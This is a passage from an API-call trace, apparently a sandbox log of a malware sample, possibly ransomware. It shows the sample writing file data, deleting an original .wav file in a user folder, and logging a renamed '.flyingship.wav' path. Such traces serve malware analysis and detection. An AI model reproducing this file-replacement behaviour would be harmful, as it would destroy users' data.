lpMsg=0x87f114) returned 0 [0185.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0185.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0185.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0185.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0185.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0185.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0185.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0185.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0185.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0185.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0185.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0185.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0185.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0185.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0185.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0185.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0185.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0185.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0185.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0185.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0185.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0185.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0185.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0185.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0185.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0185.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0185.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0185.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0185.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0185.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0185.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0185.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0185.038] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0185.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.039] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0185.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9ba570, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0185.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.039] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0185.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0185.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0185.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0185.040] WriteFile (in: hFile=0x138, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0xdf62, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0xdf62, lpOverlapped=0x0) returned 1 [0185.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0185.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0185.041] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0185.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0185.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0185.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0185.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0185.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0185.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0185.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0185.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0185.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0185.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0185.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0185.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.042] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.042] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.042] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.042] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.042] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0185.042] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.042] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.042] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.044] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.044] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.044] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.044] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.044] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav", lpFilePart=0x0) returned 0x55 [0185.046] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf67429e0, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0xd410af80, ftLastAccessTime.dwHighDateTime=0x1d5e380, ftLastWriteTime.dwLowDateTime=0x138a8d00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xdf62, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="APDdf3aoZrXaHEczyAP.wav", cAlternateFileName="APDDF3~1.WAV")) returned 0x90ae18 [0185.046] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\apddf3aozrxaheczyap.wav")) returned 1 [0185.061] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf67429e0, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0xd410af80, ftLastAccessTime.dwHighDateTime=0x1d5e380, ftLastWriteTime.dwLowDateTime=0x138a8d00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xdf62, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="APDdf3aoZrXaHEczyAP.wav", cAlternateFileName="APDDF3~1.WAV")) returned 0 [0185.061] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0185.061] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.062] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.062] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0185.062] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.062] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0185.062] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0185.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.062] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0185.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0185.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.062] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.062] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0185.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0185.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0185.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0185.063] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0185.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0185.063] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0185.064] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.064] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0185.064] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.064] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0185.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0185.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0185.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.065] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0185.065] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2287, lpOverlapped=0x0) returned 1 [0185.065] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0185.065] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x2287, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.065] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0185.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0185.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0185.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.flyingship.wav\r\n", cchWideChar=99, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 99 [0185.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x63) returned 0x8e8320 [0185.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 